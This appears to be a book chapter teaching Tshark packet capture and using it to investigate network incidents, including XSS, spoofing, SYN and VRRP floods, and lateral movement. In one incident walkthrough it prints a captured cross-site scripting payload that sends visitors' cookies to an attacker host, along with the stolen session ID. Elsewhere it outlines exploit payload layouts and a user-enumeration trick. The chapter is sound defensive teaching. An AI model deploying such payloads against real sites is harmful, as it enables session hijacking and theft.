Instant Traffic Analysis with Tshark How-to

Like any other program written in C, Tshark is susceptible to vulnerabilities. Sending certain type of malformed traffic or opening a malicious pcap file could be enough to get a shell on a vulnerable computer. See, for example, CVE-2011-1591 for Wireshark versions before 1.4.4, which is susceptible to a buffer overflow in the DECT dissector. This vulnerability could be exploited to execute certain payload (for example, a reverse shell) on a computer running Wireshark by sending a single malicious packet.

It is, therefore, highly recommended to run Tshark with the least privileges required for data collection. Thus, if an exploit could run code on our host, it would be limited to the permissions of the user who launched the Tshark process. One possible solution to limit such permissions is to implement filesystem capabilities, available from kernel 2.2. These capabilities allow splitting the actions reserved for root in small privileges, which can be individually enabled or disabled for a certain process. In our case, only two of these capabilities, CAP_NET_RAW and CAP_NET_ADMIN, will be necessary to enable data capture. Let's see how to do this. At first we will create a group called tshark. Then, we will add a normal user to that group (bmerino), and finally we will add capabilities to Dumpcap so that that group could run Tshark with only the necessary permissions to capture from the network device. Take into account that this differs from setting the UID bit to Dumpcap since in that case it would be run as root:

root@Mordor:~# groupadd tshark
root@Mordor:~# usermod -a -G tshark bmerino
root@Mordor:~# chgrp tshark /usr/bin/dumpcap
root@Mordor:~# chmod 750 /usr/bin/dumpcap
root@Mordor:~# setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
root@Mordor:~# getcap /usr/bin/dumpcap
/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip

To verify that we have permission to really capture traffic, we will launch Tshark specifying the listener interface (wlan1 in our case):

root@Mordor:~# su bmerino
bmerino@Mordor:/$ tshark -i wlan1 -c 1 -q

This should generate the following output:

Capturing on wlan1
1 packet captured

The easiest way to capture traffic on your local network is to run Tshark without any parameters, in which case it will use the first interface (non-loop) it finds. Tshark, like Wireshark, relies on Dumpcap for data collection. Since Dumpcap only implements basic functionality for packet capture, it is much safer to grant root permissions to this tool instead of Tshark or Wireshark, which present a much more complex logic and therefore are more susceptible to vulnerabilities. Dumpcap, alongside a number of other utilities, is located within the wireshark-common package, which will be included in the default installation of Tshark.

Look at the following screenshot to see how Tshark creates a child process with Dumpcap for data capture:

The following steps describe how to capture data using Tshark:

The figure that follows shows a generic operation of Tshark and its dependencies with other operating system components for data capture. When a packet arrives at the network card, the MAC destination address is checked to see if it matches yours, in which case an interrupt service routine will be generated and handled by the network driver.

Subsequently, the received data is copied to a memory block defined in the kernel and from there it will be processed by the corresponding protocol stack to be delivered to the appropriate application in user space. Parallel to this process, when Tshark is capturing traffic, the network driver sends a copy of the packets to a kernel subsystem called Packet Filter, which will filter and store in a buffer the desired packets. These packets will be received by Dumpcap (in user space) whose main goal will be to write them into a libpcap file format to be subsequently read by Tshark. As new packets arrive, Dumpcap will add them to the same capture file and it will notify Tshark about their arrival so that they can be processed.

It is important to understand that when the kernel receives packets it has to copy them from kernel space to user space. Such a context switch involves CPU time, so capturing all the data flow passing through our network card would be a loss of performance for the entire system. Here is where capture filters come into play since they will allow us to discard, from the kernel space, those packets we are not interested in and allow the rest, with the gain in performance that this entails. In this way, we would generate fewer context switches and would eliminate unnecessary processing from the user space.

From Tshark we can define capture filters in a user-friendly way that will be compiled into a language understood by the filtering architecture implemented in the kernel and applied to each packet received by our network card; all in runtime and transparently to the user. All this work is done by libpcap, which provides support for BPF or "BSD Packet Filter", the filter capture system that underlies much of the current operating systems. The syntax for these filters is the same as that used by tcpdump or any other program that uses libpcap. To define this kind of filter you should use the –f parameter. For example, if we are interested in only capturing DNS traffic, we can define a capture filter to get only UDP packets whose port is 53.

bmerino@Mordor:/$ tshark -f "udp port 53" -i eth0

This should generate the following output:

Capturing on eth0
0.000000 192.168.1.129 -> 87.216.1.65  DNS 82 Standard query 0x7cf4  A 
www.securityartwork.es

It is important, however, not to confuse these filters with the display or read filters, which represent the cornerstone of Tshark. These filters follow the nomenclature of the application itself and are used to filter packets that have been captured previously. Display filters let you make the most of the potential offered by the dissectors, which are in charge of decoding and interpreting each of the fields of each protocol. Take a look at this nice cheat sheet from PacketLife to see a summary of the most common display filters at http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf.

This is what really makes a difference from any other type of protocol analysis tool since these filters allow us to select packets in a more accurate and comfortable way than that provided by the capture filters. To define this type of filter we will use the –R option. For example if we want to see only CDP packets from the router with a device ID of R1, we would use the following filter:

bmerino@Mordor:~$ tshark -R "cdp.deviceid == R1" -i eth0

This would generate the following output:

Capturing on eth0
 1   0.000000 00:e0:1e:aa:bb:cc -> 01:00:0c:aa:bb:dd CDP 300 Device ID: R1  Port ID: Ethernet0

It is likely that capture filters do not provide us the accuracy needed to capture the packets we are interested in, so sometimes the joint use of both filters (capture and display) will provide us with the perfect combination for our needs. In the following example we will capture the community strings of SNMP requests using both filters. We will use a capture filter to just capture traffic destined to port 162, and a display filter to select precisely the community string of those packets. The -x option will tell Tshark to dump the content of the packets matched in an ASCII and hexadecimal way. The following screenshot is similar to that shown in the lower window of Wireshark.

Since there are hundreds of protocols available on Tshark, it would be impossible for us to remember each of their fields. So, if you need to create a display filter and you don't remember the fields of certain protocols, you can use the –G parameter. This option will dump the contents of the registration database of Tshark to stdout. From this information we can extract each of the fields of the protocol we need. So, for instance, if we want to know the fields available for the EIGRP routing protocol, we could type:

bmerino@Mordor:~$ tshark -G | cut -f3 | grep "^eigrp\."

This would generate the following output:

eigrp.opcode
eigrp.as
eigrp.tlv

The methods that follow are described as some of the best alternatives used to capture traffic.

Switch(config)# monitor session 1 source vlan 20
Switch(config)# monitor session 1 destination interface gigabitethernet0/1
Switch(config)# end

Let's look at each of the options previously seen.

Bridge mode: By configuring our Linux host in bridge mode we would manage to do a physical MitM (man-in-the-middle), from which we could capture traffic and from where you will have access to all traffic throughput. Obviously, to perform this configuration we will need two network cards and some kind of software that allows us to manage the traffic passing through those interfaces. The main disadvantages of this capture method are the interruption of communications during the installation and having a single failure point in case of physical failure; something which under certain circumstances is unacceptable.

Hub mode: When you connect your Tshark machine to one of the switch ports, you are just seeing the frames passing between the switch and your host. The switch divides the network into segments, creating separate collision domains and eliminating the necessity for each station to compete for the medium. In this case the switch will send frames to all ports (belonging to the same VLAN) in the case of broadcast packets (for example, to know the physical address of a certain host). If our intention is to capture the traffic of multiple computers connected to the same switch, we can make use of a hub. This way we don't need extra configuration. Since we are in the same collision domain as the hosts we want to monitor, we just need to execute Tshark specifying the interface connected to the hub. Note however that this option would slow down the network performance, thus creating a single collision domain. Also, consider the security implications that this configuration would entail since someone (as we are) could be listening for frames destined for other machines.

Packet capture: Some Cisco appliances can capture the traffic passing through their interfaces (the packet capture feature) and save it in a pcap file. In the next figure the external interface of a Cisco ASA firewall is configured to capture inbound and outbound traffic directed to the web server.

Port mirroring: configuring a port mirroring (SPAN mode in Cisco devices) is also a good alternative to capture traffic. This mode enables you to duplicate the traffic between one or more switch ports and mirror it to the port that you want. It is important to note that the port configured for mirroring has to be as fast as the port(s) to be monitored, to avoid packet loss.

Remote capture with rpcapd: If our networking devices lack NetFlow support (http://en.wikipedia.org/wiki/NetFlow) to capture traffic remotely, we can use rpcapd.

This tool is included in the default installation of WinPcap (the libpcap libraries for Windows) and allows us to set up a listening port to which we could connect remotely to get the traffic of that host.

Other methods: On certain occasions, if you cannot use the previous methods, you can use tools such as Ettercap, Dsniff, or similar to make a MitM (man-in-the-middle) attack. It is important to understand that this is a rather aggressive method and that it is only useful in non-critical environments where there is a need to intercept traffic between various hosts.

Tshark gives us the option to collect statistics on multiple types of network traffic with the –z parameter. In the examples seen previously we used this option to obtain the IP peer-to-peer conversations between various computers in our network. To set other kind of conversations we run –z as follows: -z conv,type[,filter] where type represents the kind of peer-to-peer conversation (TCP, UDP, IP, FDDI, and so on) we want to get the stats from. Optionally you can specify a filter so that only the packets that match the filter will be used in the calculations. For example, to display the TCP conversation of the IRC protocol we would run:

We use the -q parameter when reading captured files to display just the stats and not any per-packet information. The other stats seen in this recipe is follow, which shows the content of the TCP or UDP stream between two nodes. This option is similar to "Follow TCP/UDP Stream" in Wireshark. Its syntax is -z follow,prot,mode,filter[,range], where prot can be TCP or UDP. mode specifies the output type (ASCII/hex) and the optional range specifies which "chunks" of the stream should be displayed.

In addition to statistics seen, there is the ability to show the total number of bytes and frames in time intervals. To do this we use -z io,stat,interval[,filter] [,filter]… where interval is the interval in seconds. For example, it was observed that the IP 192.168.15.4 had established a connection to the machine 192.168.30.5 on port 8000. We can get the connection statistics in intervals of 100 seconds (some of the rows have been omitted):

bmerino@Mordor:/$ tshark -r 8000.pcap –q –z io,stat,100,tcp.port==8000

This command would generate the following output:

| Interval   | Frames | Bytes | Frames |  Bytes |
|-----------------------------------------------|  
|  0 <> 100  |     44 |  7644 |     44 |   7644 |
|100 <> 200  |     30 |  2180 |     30 |   2180 | 
|200 <> 300  |      0 |     0 |      0 |      0 |  

Finally, in this recipe we use the -o option, which allow us to change some settings of Tshark. Wireshark and Tshark rely on a configuration file to load default preferences. We can modify these values by using the -o option followed by prefname:value. To dump a list of default preferences, use -G followed by defaultprefs. For example, by default, Wireshark and Tshark convert all sequence numbers into relative numbers to facilitate comprehension and tracking of the packets involved in a TCP session. This means that the sequence number corresponding to the first packet in a TCP connection begins with 0 and not with a random value generated by the TCP/IP stack of the operating system. If we need to view the absolute value, that is, the real value of the SEQ and ACK fields, we can disable the "Relative Sequence Numbers" option with tcp.relative_sequence_numbers:FALSE:

bmerino@Mordor:/$ tshark -G defaultprefs | grep "relative_seq"
relative_seq#tcp.relative_sequence_numbers: TRUE
bmerino@Mordor:/$ tshark -r tcpsecuence.pcap -T fields -e tcp.seq -R tcp | head -3
0
16
bmerino@Mordor:/$ tshark –r tcpsecuence.pcap -T fields -e tcp.seq -R tcp -o tcp.relative_sequence_numbers:FALSE | head -3
2516813179
2516813195

Do not worry about the -T and -e options; we will seen them in detail in the next recipe. We also used –o several times with the column.format directive to specify the columns displayed in the output. The value associated with this directive consists of pairs of strings indicating the title of the column and its format. For example, with -o column.format:"Protocol","%p", we would only show the protocol of each packet. If you need to know the % variables take a look at Wireshark sources, in particular the C file wireshark/epan/column.c:

root@Mordor:~/wireshark# cat epan/column.c | grep –m 1 COL_PROTOCOL
    "%p",    /* 48) COL_PROTOCOL */

Tshark allows us to load our own "Configuration Profiles". This will be really useful when we use different configurations, depending on the type of analysis that we perform. For example, there will be times you want to disable the dissectors, or you may want to show the output in a different view or format. By using your own configuration profile you won't need to write a long list of –o parameters; just specify the file with the –C option and Tshark will load that setting:

bmerino@Mordor:~/.wireshark/profiles$ tshark -C "A1_audit" -i eth0

This command would generate the following output:

Capturing on eth0
64:68:0c:ea:41:ad -> 01:80:c2:00:00:00 60 
192.168.1.42 -> 173.194.34.54 1484

The method that follows shows how to implement useful filters using just Tshark.

Passive DNS

If we have access to a DNS server with a large volume of traffic, it could be useful to us at any given time to implement a passive DNS service. The idea is to record the authoritative DNS responses sent to clients to know the IP domain association of each of the DNS queries. Having a history with this information will help to identify fast-flux botnets that constantly update DNS with very low TTL values, know what domain names are on a given IP, where a domain name pointed to in the past, and so on. With Tshark we can easily do this by running the following command:

bmerino@Mordor:$ tshark -i eth0 -f "src port 53"  -R "dns.flags.authoritative == 1" -n -T fields -e dns.qry.name -e dns.resp.addr -E occurrence=f

This command would generate the following output:

Capturing on eth0
securityartwork.es  90.161.233.229
google.com  212.106.221.23
dropbox.com  199.47.216.179

The operators contains and matches will allow us to search for literal strings in received packets. The matches operator, however, provides the additional advantage of supporting Perl Compatible Regular Expression (PCRE) so it will be of great interest when looking for a variety of attacks such as DDoS, fuzzing, opcodes that match a certain exploit, and so on. In the previous example, many exploits typically have a structure similar to the following:

payload= string + buffer + egg + shellcode + eip + nops + egghunter
payload= junk + egg + shellcode + eip + nops + egghunter
payload= junk + eip + nops + shellcode
payload= junk + egg + shellcode + junk1 + nseh + seh + nops + egghunter
payload= nops + shellcode + nops + eip + nops + farjump + nops
payload = junk + nseh + seh + nops + shellcode + junk1

We, therefore, used a complex filter to try to match any of these cases. You can see this example in more detail in http://www.securityartwork.es/2011/12/16/buscando-buffer-overflow-desde-wireshark/. Tshark obviously is not the right tool to locate and analyze shellcodes. The example is only intended to demonstrate the filtering power that the matches operator has. To this end, IDS, such as Snort, are more suitable to detect such attacks. However, keeping some of these filters in mind can save us a lot of time in certain circumstances.

In this recipe we have seen new Tshark parameters. One of the most used has been -T through which we could mold the output generated by Tshark. This function follows the syntax -T pd ml|psml|ps|text|fields, where each of the options represents the output format. Probably the most used by us is fields, as it allows us to specify which fields we want to show on screen. This parameter will provide us with huge advantages if we want to use the Tshark output to feed other programs or to make our own scripts; something you could not do with Wireshark.

The fields we want to display are indicated by the parameter –e, and we can optionally specify some aspects of its format by using -E. For example, to display on screen just the IP source address and the destination TCP port in a comma separated way (CSV format), we would use the following command:

bmerino@Mordor:/$ tshark -r capture.pcap -T fields -e ip.src -e tcp.dstport -E separator=, | head -1
192.168.1.136,443

You can view in more detail the –T and –E options in the online help of Thsark (http://www.wireshark.org/docs/man-pages/tshark.html).

Finally, as we will see in the next section, the -V option will allow us to visualize in great detail the packets received, showing each of the fields of each of the protocols. With -O, however, we can specify a detailed view only of the comma-separated list of protocols. For example, to show in detail just the OSPF protocol, we would execute Tshark as tshark -i eth0 -O ospf.

Let's see an example with the contains operator. We will look for potential XSS attacks in POST requests to our web server:

bmerino@Mordor:/$ tshark -T fields -e frame.time -e ip.src -e ip.dst -e http.request.uri -r XSS.pcap -R 'http.request.method == POST and tcp contains "<script>"'

This would generate the following output:

Jan  9, 2013 13:55:10.710239000 192.168.1.130  192.168.1.129  /doRegister.php

It seems that the host 192.168.1.130 modified one of the POST parameters to inject JavaScript code on our web server (192.168.1.129). Let's see the code:

bmerino@Mordor:/$ tshark -V -r XSS.pcap -R 'http.request.method == POST and tcp contains "<script>"' | grep "<script>"

This would generate the following output:

name="><script>document.location.replace('http://192.168.1.160/cookie.php?c='+document.cookie);</script>&city=spain&mysubmit=0

According to the previous output, the attacker tried to inject the code to produce a persistent XSS taking advantage of the vulnerable field name. This way, when a user visits any page that includes the name registered, the cookie of that user will be sent to the host 192.168.1.160. We could see that the attack was successful after filtering HTTP traffic destined to that host (192.168.1.160):

bmerino@Mordor:/$ tshark -r XSS.pcap -R "tcp.dstport == 80 && ip.dst == 192.168.1.160" | grep cookie

This would generate the following output:

2138 455.082771000 192.168.1.129 -> 192.168.1.160 HTTP 453 GET /cookie.php?c=PHPSESSID=a3iiu2242kllmmae2099sa29322fda HTTP/1.1

As indicated in the output, it appears that the attacker got the cookie from at least one victim. We, therefore, conclude that the stored XSS injection was successful.

Sometimes, Tshark applies the wrong dissector to interpret certain protocols. This happens, for example, when an application protocol runs on a different port than the standard (for example, when we run HTTP over port 4444 instead of port 80). We can force Tshark to use the correct dissector with the –d parameter. This option has the following syntax: -d <layer type>==<selector>,<decode-as protocol>.If you want to get a list of valid dissectors, you can run tshark –d ..

A really nice summary of how Tshark uses the dissector wisely can be read in this thread at http://www.wireshark.org/lists/wireshark-dev/200808/msg00252.html.

On the other hand, to decode SSL traffic we used the –o option following the syntax -o ssl.keys_list:<ip>,<port>,<proto>,<keyfile> -o ssl.debug_file:<log-file>.

Thanks to this function, we could see and analyze the payload of SSL traffic directed to our web server in plain text. Some attacks can use SSL data to try to evade firewalls (DPI), IDS/IPS, and so on; therefore, it would not be strange to decrypt SSL packets to investigate certain security incidents. In the previous example, an attacker has used Havij through Stunnel to perform SQLi attacks against a web server. After getting a shell, he has eliminated all possible system logs that might give clues to the type of attack conducted. Luckily for us, we got a pcap file of that connection an hour before the incident, so we were able to analyze it.

If you want to check the current preferences for SSL, you can run Tshark with the -G option followed by defaultprefs:

bmerino@Mordor:/tmp$ tshark -G defaultprefs | egrep "^#ssl"

This would generate the following output:

#ssl.debug_file: 
#ssl.keys_list: 
#ssl.desegment_ssl_records: TRUE
#ssl.desegment_ssl_application_data: TRUE
#ssl.ignore_ssl_mac_failed: FALSE
#ssl.psk: 
#ssl.keylog_file

Maybe you are wondering how we can know which protocol is traveling in a non-standard port? If we don't know the protocol running, we could not select the right dissector for decoding that traffic. Well, the answer is simple: by investigating the data traffic. A good approach would be to consult the first packets exchanged, as it is in these packets where we could find banners, exchange keys, authentication attempts, or any other clue about the protocol. Here's an example. After seeing a high volume of traffic on port 23 (used by Telnet theoretically) we decided to check its contents. Not only the volume of traffic but the size of the packets made us suspect that possibly someone was using an other protocol over the telnet port. After checking the payload of one of the frames, we could confirm that it was not telnet. However, the payload did not give us any clues about the type of protocol being used so we decided to observe the first frames of the connection (after the "TCP handshake"). Quickly, we found out that a user was using VNC, thanks to the string RFB 004.001.

Finally, it's important to note that Tshark can also decrypt Kerberos tickets from keytab files. This is possible by using the -K option (-K krb5.keytab).

The examples that follow show how to detect some network attacks (internal and external) using just Tshark from the command line.

Suppose that, as on any other day, you open the browser to view your email. But this time, after typing www.gmail.com in the navigation bar, you run into an error as shown in the following screenshot:

What? My browser does not trust Google? If you come across this, you can be sure that someone is doing a man-in-the-middle attack, either playing around with ARP, DNS, or both (see Ettercap + dns_spoof plugin). To check this, we will take a look in our ARP cache to see if someone is trying to fake our gateway (a ZyXEL router). This way if the cached MAC of the IP 192.168.1.1 (our gateway) doesn't match the MAC of the router, we can confirm the attack.

According to the preceding output we can see how the cached MAC corresponds to a Sun xVM VirtualBox. The attacker did not even bother to change the first three bytes of the MAC to emulate a ZyXEL router. If we use arping to send an ARP request to our gateway we can see the real MAC address. Also, if we try to resolve mail.google.com we can confirm that the attacker is also faking DNS responses. As we see, the IP of the machine 192.168.1.131 corresponds to the MAC that is trying to fake the router, so we can be sure that that IP belongs to the attacker:

bmerino@Mordor:~$ ping mail.google.com –t 1
PING mail.google.com (192.168.1.131) 56(84) bytes of data.
bmerino@Mordor:~$ arp -an | grep 131
? (192.168.1.131) en 08:00:27:21:f9:85 [ether] en wlan1

Note that, in this case, we could detect this attack because it was directed to our machine. If the victim was another host, it is likely that we would not even notice this attack. An ARP spoof can be used to attack all hosts within the broadcast domain of the current VLAN or specific hosts. Use the filters described before in the ARP spoofing section in the Auditing network attacks recipe to detect such attacks. Likewise, to understand in greater detail DHCP attacks and their countermeasures, take a look at http://www.securityartwork.es/2013/01/30/defenses-against-dhcp-attacks/?lang=en.

If you experience problems with your network, such as hosts that disconnect, packet loss, duplicate IP, and so on, consider using Tshark to analyze such protocols. Tools such as Loki, dhcpstarv, Yersinia, macof, and a few more, can give you huge headaches in an environment that lacks countermeasures such as Dynamic ARP Inspector (DAI), IP Source Guard, DHCP Snooping, Port Security, and so on. A good approach is to start analyzing protocols of lower layers to upper layers. "Analyze" means to observe the frequency, size, or any other conditions that make us suspicious.

Tshark is equally useful when it comes to quickly identifying DDoS attacks. The following example shows a typical SYN flood against our HTTP server:

bmerino@Mordor:~$ tshark -i eth0 -T fields -e frame.time_delta -e ip.geoip.src_country -e ip.src  -R "tcp.flags.syn==1 && tcp.flags.ack==0 && tcp.dstport==80 && ip.dst==192.168.1.42"

This would generate the following output:

Capturing on eth0
0.036926000     Brazil       177.158.236.156
0.000397000     South Africa     41.21.184.75
0.000145000     China       110.121.38.23
0.000133000     Ireland      212.147.206.156

Although such attacks immediately jump out at you due to the high number of packets with the SYN bit set, the preceding example shows more clearly the operation of such a flood. Thousands of packets are sent from spoofed IPs with the SYN bit. This means that our server has to wait for each connection a given time (until the TCP three-way handshake is complete), during which more packets keep coming. A very large number of packets may end the resources of the server, so it stops responding to more connections. Notice that we have used the GeoIP databases from http://www.maxmind.com. To setup GeoIP with Tshark/Wireshark take a look at http://wiki.wireshark.org/HowToUseGeoIP.

bmerino@Mordor:~$ tshark -v | grep -i geo
Python, with GnuTLS 2.12.14, with Gcrypt 1.5.0, with MIT Kerberos, with GeoIP
bmerino@Mordor:~$ tshark -G defaultprefs | grep use_geo
#ip.use_geoip: TRUE

GeoIP can be very useful not only in such attacks but for any incident related to geolocation. For example, suppose you have configured a GRE tunnel (Generic Route Encapsulation) on your border router. According to the company's policy, only the branches located in Spain can use this VPN. To check for any illegitimate connections we can run Tshark as follows:

bmerino@Mordor:~$ tshark -r greTunnel.pcap -T fields -e ip.geoip.src_country -e ip.src -R "not ip.geoip.src_country contains Spain"
United States *.*.*,*

Note that SYN flood attacks generally require the cooperation of thousands of hosts to succeed. However, the techniques in denial of service attacks have evolved enough in the last years to just need a few hosts to knock down a web service. Take a look at tools such as SlowLoris, Hulk, or THC, which allow you to do a denial of service from the application layer. In these cases we probably need a deeper analysis (HTTP headers, SSL traffic, and so on) to understand the attack technically. Consider using some of the filters seen previously to identify other kind of attacks such as IP fragmentation attacks. This type of attack is used to circumvent countermeasures such as firewalls or IDS by sending many small fragments. Use the ip.fragment and ip.flags.mf filters to observe this kind of packets.

Also take a look at countermeasures such as TCP-Intercept, DNS Inspection, Frag Guard, Flood Guard, Unicast Reverse Path Forwarding, and so on, implemented in some Cisco devices. The deployment of these technologies will be really efficient to mitigate or greatly reduce most of the attacks seen so far.

In the example of DHCP attacks we used the -a option to indicate the number of seconds to capture. This is a really interesting option of Tshark since it allows us to specify an autostop condition, thanks to which we will not have to be present to manually stop a capture. We can specify up to three criteria as a stop condition of the form test:value where test is one of duration (seconds), filesize (kilobytes), or files. In a similar way, we can use the –b option if we want to run Tshark in "multiple files" mode. In this mode TShark will write to several capture files. When the first capture file fills up, TShark will switch writing to the next file and so on (take a look at the http://www.wireshark.org/docs/man-pages/tshark.html to get more information about this option). So, if we want to capture traffic and generate files of 1000 KB in length, we would execute something as follows:

bmerino@Mordor:~$ tshark -i eth0 -b filesize:1000 -w A.pcap
Capturing on eth0
2049
bmerino@Mordor:~$ ls A_*
A_00001_20130203154505.pcap  A_00002_20130203154529.pcap

Remember that you can later merge several files into one .pcap file using Mergecap (tool included in the default installation of Wireshark):

bmerino@Mordor:~$ mergecap A_00001_20130203154505.pcap 
A_00002_20130203154529.pcap -w output.pcap –a
bmerino@Mordor:~$ ls -lh output.pcap 
-rw-r--r-- 1 bmerino bmerino 2,0M feb  3 15:51 output.pcap

One advantage of the -b option is the ability to set up a ring buffer. This is a good way to prevent filling the entire hard disk with many pcap files. We do this with the files parameter. So, for example, if we want to rotate a log file every 1000 seconds and maintain a maximum number of 10 files, you would execute:

bmerino@Mordor:~$ tshark -i wlan1 -b duration:1000 -b files:10 -w test.pcap
Capturing on wlan1
3282 ^C
bmerino@Mordor:~$ ls -l test*
test_00001_20130203155318.pcap  test_00002_20130203155418.pcap

Finally, note that Tshark supports different data link types. You can use the –L option to show the types supported by your interface and the –y option to set the one you are interested in. If this option is not set, the default capture link will be used:

bmerino@Mordor:~$ tshark -L -i wlan1
Data link types of interface wlan1 when not in monitor mode   (use option -y to set):
  EN10MB (Ethernet)
  DOCSIS (DOCSIS)

The following example shows another case of DDoS attack, this time a more unusual attack that affects the VRRP protocol. Thanks to Tshark we could find out the source of such an attack.

Our network has several Cisco routers configured with Virtual Router Redundancy Protocol (VRRP). This protocol, similar to HSRP, allows you to group a set of routers under a single Virtual IP/MAC so that the group is fully transparent to the client configuration. In this group, just one of the routers (the master virtual router) will be responsible for routing packets to their destination while the rest will monitor the status of the master. In case the master fails, it will be replaced by one backup router which has the highest priority. However, in the last hour the network users complain that they have had troubles connecting to the Internet; oddly, there are several redundant routers.

To investigate this incident, we began monitoring VRRP traffic.

bmerino@Mordor:~$ tshark -i eth0 -R vrrp 

This would generate the following output:

Capturing on eth0  
  0.000049  192.168.1.5 -> 224.0.0.18   VRRP 60 Announcement (v2)
  0.534392  192.168.1.5 -> 224.0.0.18   VRRP 60 Announcement (v2)
  0.534437  192.168.1.5 -> 224.0.0.18   VRRP 60 Announcement (v2)

We noticed that the frequency of these packets was higher than normal. This made us think that someone was trying to make a man-in-the-middle by faking a VRRP router using a higher priority than the master (its current priority was 150); so, we decided to filter out just the priority of those packets:

bmerino@Mordor:~$ tshark -i eth0 -R vrrp -T fields -e vrrp.prio

This would generate the following output:

Capturing on eth0
0

This was even weirder. Someone was forging VRRP packets with a priority of 0. But, why? After checking the VRRP v2 RFC we found the following:

Now it makes sense, someone was doing a denial of service by sending forged packets usurping the VRRP master router but with a priority of 0. This forced the master to release its responsibility and generate new renegotiations with the backups. Let's see this more clearly. The following screenshot corresponds to part of the output generated by the command bmerino@Mordor:~$ tshark -i eth0 -R vrrp -S --------- -V:

To prevent such attacks with VRRP, consider using MD5 authentication and limit multicast traffic only to VRRP routers participating in the negotiation of the virtual router.

It's not new to use tunneling techniques to attempt to circumvent firewalls or other countermeasures that do not make use of deep packet inspection. Tools such as iodine, Hping3, Netcross, and so on, can be used to encapsulate certain type of traffic within the payload of another protocol and thus get its contents hidden. The use of these tools can be tedious for network administrators who try to control the information entering and leaving their network. Tshark can be an effective tool to detect this type of traffic if it's done wisely.

Let's see another case. The internal server (192.168.1.130/24) of a certain organization has been compromised several times. The fact that the server is not accessible from the outside led us to think that an internal user had also been compromised, and the attacker was doing "pivoting" from that machine to the server. Another option was that an infected USB had been the root of the problem. However, after checking that the firewall did not filter the traffic DMZ ---> Internal Network, we could confirm that this was the origin of the intrusion. The web server (192.168.20.1/24) in the DMZ was compromised, and from here the attacker could access the internal LAN using the Administrator account. To do this the attacker used Mimikatz to get the credentials of that machine and then ran Psexec against the internal server with the Administrator account.

We realized this when we checked the traffic from DMZ to the Internal LAN as follows (note the use of the flag SYN = 1 and ACK = 0 to show only connections initiated from the DMZ):

bmerino@Mordor:~$ tshark -r pivo.pcap -T fields -e ip.src -R "ip.src == 192.168.20.0/24 && ip.dst==192.168.1.130 && tcp.flags.syn==1 && tcp.flags.ack==0" | sort -u
192.168.20.1

According to this information the machine 192.168.20.1 (the web server) started some kind of connection with the internal server.

The following output shows an excerpt of the type of traffic generated between both machines:

bmerino@Mordor:~$ tshark -r pivo.pcap -o column.format:'"Info","%i","Protocol","%p"' -R "ip.src == 192.168.20.1 && ip.dst==192.168.1.130" | head -4

This would generate the following output:

Tree Connect AndX Request, Path: \\192.168.1.130\IPC$ SMB
Redirect             (Redirect for host) ICMP
[TCP Retransmission] Tree Connect AndX Request, Path: \\192.168.1.130\IPC$ SMB
Trans2 Request, QUERY_PATH_INFO, Query File Basic Info, Path: \PSEXESVC.EXE SMB

As shown in the output, the web server initiated a NETBIOS connection with the internal server (something totally suspicious). From there, he ran Psexec to authenticate to the server machine. You can also see the plaintext password and the user used to login the server (surely he uses Psexec with -u option, which sends the password in clear text):

bmerino@Mordor:~$ tshark -r pivo.pcap -x "ip.src == 192.168.20.1 && ip.dst==192.168.1.130" | grep "A.D.M.l" -m 1 -A 1 | awk -F "  " '{print $3}'

This would generate the following output:

 A.D.M.l.o.c.1.0.
 1...............

Note that there will be more complex cases that will require much deeper research. Take a look, for example, at this article at http://www.securityartwork.es/2012/11/27/covert-channels-2/?lang=en, which explains some covert-channel techniques with a few TCP and IP fields. In such cases, the joint use of debuggers, traffic analysis tools, and event correlation will be our best ally.

Here's another quick example. Occasionally, we may find that Tshark cannot interpret certain protocols. For instance, if we analyze a proprietary protocol and Tshark does not have its dissector we would only see the raw payload. However, this may sometimes provide us with clues about the behavior of the application. The output that follows shows an extract of traffic generated between a client (192.168.254.221) and a server (192.168.254.220) using an unknown protocol. The payload sent by the client represents a login attempt against the server. The server response is made up of a set of bytes whose meaning is unknown to us. Take a look at the following screenshot:

However, after trying many login attempts with different users and passwords and observing the server responses, we could infer when the user exists in the database. Although all logins were unsuccessful, when we used the admin user one of the bytes of the response was totally different from the rest of replies. Thanks to this, we could make a little script to get valid users from the server based on that set of bytes.

bmerino@Mordor:/tmp$ tshark -r appA.pcap -T fields -e frame.number -e data.data "tcp.srcport==8882 && data.data"
6  00:00:aa:aa:0a:00:00:aa:aa:a1:aa:aa:aa:aa:aa:aa:aa
9  00:00:aa:aa:0a:00:00:aa:aa:a1:aa:aa:aa:aa:aa:aa:aa
12 00:00:aa:aa:0a:00:00:bb:aa:a1:aa:aa:aa:aa:aa:aa:aa
15 00:00:aa:aa:0a:00:00:aa:aa:a1:aa:aa:aa:aa:aa:aa:aa
18 00:00:aa:aa:0a:00:00:aa:aa:a1:aa:aa:aa:aa:aa:aa:aa
bmerino@Mordor:/tmp$ tshark -r appA.pcap -R frame.number==11 -x | grep '<.*>' -m 1
0060  30 30 30 30 7e 7e 3c 61 64 6d 69 6e 3e 7c 7c 7c   0000~~<admin>|||

Performing simple checks on our network periodically can help us to detect malware. For example, if your network hosts use an internal DNS to resolve names, something as simple as checking that all requests are coming from that server can help us identify infected hosts. The reason is that malware might bypass the host DNS settings. For example, using the DNS_QUERY_NO_HOSTS_FILE flag in the DnsQuery API, the malware will not query the hosts file. Even better, the malware can open a UDP socket and construct UDP packets to send them directly to a particular resolver. The response is then parsed by the malware itself and this way it would not even need to change the DNS setting of that host. Festi Botnet, for example, uses this technique to choose 8.8.8.8 (Google) as a resolver.

In this recipe we have used another option of Tshark, -P. This parameter allow us to decode and display packets even while we are writing raw packet data using the –w option, useful if we want to store packets and watch them at the same time. We have also used the –T pdml option to set the output format. Packet Details Markup Language (PDML) is an XML-based format equivalent to the packet details printed with the –V flag. Tshark has another option to specify the format in which to write the file by using the –F option; in this case, however, you can't specify it for a live capture:

bmerino@Mordor:~$ tshark -r malware.pcap -F pcapng –w malwareA.pcap

To list the available file formats use the -F flag without a value:

bmerino@Mordor:~$ tshark -F

This would generate the following output:

tshark: The available capture file types for the "-F" flag are:
    5views - InfoVista 5View capture
    btsnoop - Symbian OS btsnoop
<rest of output omitted>

